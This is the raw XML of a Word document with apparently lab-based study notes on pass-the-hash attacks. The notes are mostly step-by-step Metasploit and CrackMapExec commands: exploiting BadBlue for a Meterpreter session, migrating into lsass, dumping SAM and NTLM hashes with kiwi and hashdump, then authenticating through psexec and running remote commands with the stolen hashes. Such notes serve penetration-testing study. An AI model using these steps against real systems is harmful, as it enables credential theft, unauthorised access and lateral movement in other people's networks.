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3F0BC" w14:textId="6F5915A0" w:rsidR="00853ABF" w:rsidRPr="0058592D" w:rsidRDefault="0058592D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058592D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PASS THE HASH ATTACKS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D3076" w14:textId="6B3F4897" w:rsidR="0058592D" w:rsidRDefault="0058592D">
      <w:r>
        <w:t xml:space="preserve">Exploitation technique, where we capture NTLM hashes or clear passwords and utilize them to authenticate with the target legitimately via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628ADB21" w14:textId="4F08C696" w:rsidR="0058592D" w:rsidRPr="0058592D" w:rsidRDefault="0058592D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058592D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952D335" w14:textId="3622EA08" w:rsidR="0058592D" w:rsidRDefault="0058592D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metsaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BF705" w14:textId="49D7C634" w:rsidR="0058592D" w:rsidRDefault="0058592D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467FAE92" w14:textId="77777777" w:rsidR="0058592D" w:rsidRDefault="0058592D"/>
    <w:p w14:paraId="01A797FC" w14:textId="011DAE6F" w:rsidR="0058592D" w:rsidRPr="008D4DED" w:rsidRDefault="008D4DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D852E81" w14:textId="184FF534" w:rsidR="008D4DED" w:rsidRDefault="008D4DED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4AD320EC" w14:textId="2C80B6A6" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52097E09" w14:textId="7D1423DE" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC4231" w14:textId="5DDD7D75" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72306887" w14:textId="1868B87D" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="655F7D35" w14:textId="2D18E62C" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B94CB" w14:textId="77777777" w:rsidR="008D4DED" w:rsidRDefault="008D4DED"/>
    <w:p w14:paraId="378B3CC4" w14:textId="58CEBBCC" w:rsidR="008D4DED" w:rsidRPr="008D4DED" w:rsidRDefault="008D4DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2613D" w14:textId="648F5927" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6976F306" w14:textId="447FA13B" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t>Migrate (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF76695" w14:textId="1E2FBCAA" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AABC0CA" w14:textId="23927FF8" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t>Load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA806BE" w14:textId="0C7FEA55" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa_dump_sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10179F82" w14:textId="27D93B02" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the administrator hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA5952" w14:textId="1CD6A410" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the student hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097E7B0" w14:textId="77777777" w:rsidR="008D4DED" w:rsidRDefault="008D4DED"/>
    <w:p w14:paraId="3751DBC1" w14:textId="77777777" w:rsidR="00534AEB" w:rsidRDefault="00534AEB"/>
    <w:p w14:paraId="677EEA75" w14:textId="75E50065" w:rsidR="008D4DED" w:rsidRPr="008D4DED" w:rsidRDefault="008D4DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF642E8" w14:textId="5D122949" w:rsidR="008D4DED" w:rsidRDefault="008D4DED">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> perform the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the hash attack with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metsaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LM and NTLM Hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to perform this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FDC74" w14:textId="77777777" w:rsidR="00534AEB" w:rsidRDefault="00534AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0C7B35" w14:textId="4C16657A" w:rsidR="008D4DED" w:rsidRDefault="00534AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metsaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9C1A2" w14:textId="77777777" w:rsidR="00534AEB" w:rsidRDefault="00534AEB"/>
    <w:p w14:paraId="24214A5A" w14:textId="20F1FC99" w:rsidR="008D4DED" w:rsidRDefault="00FF48C6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="008D4DED">
        <w:t>ashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E4FD106" w14:textId="763BA8E4" w:rsidR="00FF48C6" w:rsidRDefault="003B6716">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00FF48C6">
        <w:t>User:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF48C6">
        <w:t>sid:LM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF48C6">
        <w:t>:NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15576F85" w14:textId="13A26B16" w:rsidR="00FF48C6" w:rsidRDefault="00FF48C6">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00DC14CE">
        <w:t xml:space="preserve"> SID -&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF48C6">
        <w:t>500 = Administrator, 501 = Guest, 1000+ = normal user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2FF3C" w14:textId="32BE43E2" w:rsidR="0058592D" w:rsidRDefault="00FE74EA">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the LM and NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF38F4" w14:textId="40ED4379" w:rsidR="00FE74EA" w:rsidRDefault="003B6716">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ctrl+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> background the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB7F4D" w14:textId="77777777" w:rsidR="003B6716" w:rsidRDefault="003B6716"/>
    <w:p w14:paraId="4FB71809" w14:textId="629EDD53" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F8EF7DF" w14:textId="12FB04F3" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t>Use the (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4ADFEB" w14:textId="62092D7A" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15227F22" wp14:editId="4DA94626">
            <wp:extent cx="2051155" cy="228612"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="197883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31079" name="Picture 19788310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155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F000" w14:textId="58F6CDFC" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEA7B6" w14:textId="7A4F20AD" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t>Set LPORT 4422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13435056" w14:textId="210EEF28" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0325B2C4" w14:textId="7B1D7A5B" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3CB7F" w14:textId="35EB0A19" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LM:NTLM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3940BA68" w14:textId="5C396F18" w:rsidR="00636630" w:rsidRDefault="00636630">
      <w:r>
        <w:t>Set target command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7881A1BE" w14:textId="3CF6C2A3" w:rsidR="00534AEB" w:rsidRPr="00534AEB" w:rsidRDefault="00534AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB43565" w14:textId="02D04BD4" w:rsidR="00534AEB" w:rsidRDefault="00534AEB">
      <w:r>
        <w:t xml:space="preserve">Here we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> try some of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to make it work with one of them </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838A6F8" w14:textId="33FBA64D" w:rsidR="003B6716" w:rsidRDefault="003B6716">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D454687" w14:textId="01BC4FF7" w:rsidR="003B6716" w:rsidRDefault="00636630">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED61C8" w14:textId="01EE55F9" w:rsidR="00636630" w:rsidRDefault="00636630">
      <w:r>
        <w:t xml:space="preserve">Set target Native\ upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102B086" w14:textId="400B3D00" w:rsidR="00636630" w:rsidRDefault="00636630">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0588E3" w14:textId="77777777" w:rsidR="00636630" w:rsidRDefault="00636630"/>
    <w:p w14:paraId="0BB8CDAB" w14:textId="28C522BB" w:rsidR="00445082" w:rsidRPr="00445082" w:rsidRDefault="00445082">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00445082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00445082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71111FDD" w14:textId="0ED02CDB" w:rsidR="00445082" w:rsidRDefault="00445082">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D693595" w14:textId="4016152A" w:rsidR="00445082" w:rsidRDefault="00445082">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="232587A6" w14:textId="14CCCD12" w:rsidR="00445082" w:rsidRDefault="00445082"/>
    <w:p w14:paraId="019EBB20" w14:textId="77777777" w:rsidR="003B6716" w:rsidRDefault="003B6716"/>
    <w:p w14:paraId="4B416985" w14:textId="0994DFD7" w:rsidR="00534AEB" w:rsidRPr="00534AEB" w:rsidRDefault="00534AEB" w:rsidP="00534AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00534AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00534AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237499EA" w14:textId="1A2F46B0" w:rsidR="00534AEB" w:rsidRDefault="00534AEB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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-u “username” -H “NTLM HASH only”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260A33D" w14:textId="4D67A190" w:rsidR="005C7347" w:rsidRDefault="005C7347" w:rsidP="005C7347">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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-u “username” -H “NTLM HASH only”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -x “ipconfig”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0429A9E6" w14:textId="71ADD1DC" w:rsidR="005C7347" w:rsidRDefault="005C7347" w:rsidP="005C7347">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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-u “username” -H “NTLM HASH only” -x “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD4505" w14:textId="27B8DDF2" w:rsidR="005C7347" w:rsidRDefault="005C7347" w:rsidP="005C7347">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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-u “username” -H “NTLM HASH only” -x “</w:t>
      </w:r>
      <w:r>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208A987" w14:textId="77777777" w:rsidR="005C7347" w:rsidRDefault="005C7347" w:rsidP="005C7347"/>
    <w:p w14:paraId="522CA4DB" w14:textId="77777777" w:rsidR="005C7347" w:rsidRDefault="005C7347" w:rsidP="005C7347"/>
    <w:p w14:paraId="62F18B34" w14:textId="77777777" w:rsidR="00534AEB" w:rsidRDefault="00534AEB"/>
    <w:sectPr w:rsidR="00534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7F3"/>
    <w:rsid w:val="001B4901"/>
    <w:rsid w:val="003B6716"/>
    <w:rsid w:val="00445082"/>
    <w:rsid w:val="004677F3"/>
    <w:rsid w:val="00534AEB"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="0058592D"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005C7347"/>
    <w:rsid w:val="00636630"/>
    <w:rsid w:val="00642568"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008D4DED"/>
    <w:rsid w:val="00DC14CE"/>
    <w:rsid w:val="00FE74EA"/>
    <w:rsid w:val="00FF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9C6A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A1C6B5E-D127-4F81-99D8-955D3A9C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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-02T09:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T09:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>